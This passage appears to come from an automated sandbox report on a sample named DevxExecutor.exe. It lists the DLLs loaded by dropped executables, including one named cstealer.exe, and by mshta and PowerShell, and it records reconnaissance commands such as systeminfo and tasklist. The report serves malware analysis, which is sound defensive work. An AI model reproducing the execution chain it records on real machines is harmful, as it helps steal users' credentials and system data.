                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: pcacli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                                Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\main.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\main.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\main.exeSection loaded: version.dll
                                Source: C:\ProgramData\main.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\main.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\main.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\main.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\main.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\main.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\main.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\main.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasapi32.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasman.dll
                                Source: C:\ProgramData\main.exeSection loaded: rtutils.dll
                                Source: C:\ProgramData\main.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\main.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\main.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\main.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\main.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: winnsi.dll
                                Source: C:\ProgramData\main.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\main.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\main.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\main.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\main.exeSection loaded: schannel.dll
                                Source: C:\ProgramData\main.exeSection loaded: mskeyprotect.dll
                                Source: C:\ProgramData\main.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\main.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\main.exeSection loaded: ncryptsslp.dll
                                Source: C:\ProgramData\main.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\main.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\main.exeSection loaded: amsi.dll
                                Source: C:\ProgramData\main.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\main.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\main.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\main.exeSection loaded: edputil.dll
                                Source: C:\ProgramData\main.exeSection loaded: urlmon.dll
                                Source: C:\ProgramData\main.exeSection loaded: iertutil.dll
                                Source: C:\ProgramData\main.exeSection loaded: srvcli.dll
                                Source: C:\ProgramData\main.exeSection loaded: netutils.dll
                                Source: C:\ProgramData\main.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\ProgramData\main.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\main.exeSection loaded: appresolver.dll
                                Source: C:\ProgramData\main.exeSection loaded: bcp47langs.dll
                                Source: C:\ProgramData\main.exeSection loaded: slc.dll
                                Source: C:\ProgramData\main.exeSection loaded: sppc.dll
                                Source: C:\ProgramData\main.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\ProgramData\main.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: DevxExecutor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: DevxExecutor.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: DevxExecutor.exeStatic file information: File size 46285824 > 1048576
                                Source: DevxExecutor.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c23a00
                                Source: DevxExecutor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2193894661.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2549694907.00007FF8B8833000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: cstealer.exe, 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: cstealer.exe, 00000009.00000002.2556408561.00007FF8B90E0000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: cstealer.exe, 00000009.00000002.2532242365.00007FF8B7E3E000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187624587.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2551384631.00007FF8B90AD000.00000002.00000001.01000000.00000020.sdmp, cstealer.exe, 00000049.00000003.2467259696.000001DB63733000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cstealer.exe, 00000009.00000002.2537892157.00007FF8B80A6000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188566786.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cstealer.exe, 00000002.00000003.2160955520.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2186856638.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2187476154.0000014E6F9D2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp, cstealer.exe, 00000009.00000002.2558162642.00007FF8B9101000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188481865.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2548484415.00007FF8B8793000.00000002.00000001.01000000.0000002D.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: cstealer.exe, 00000009.00000002.2540558545.00007FF8B80ED000.00000002.00000001.01000000.00000029.sdmp
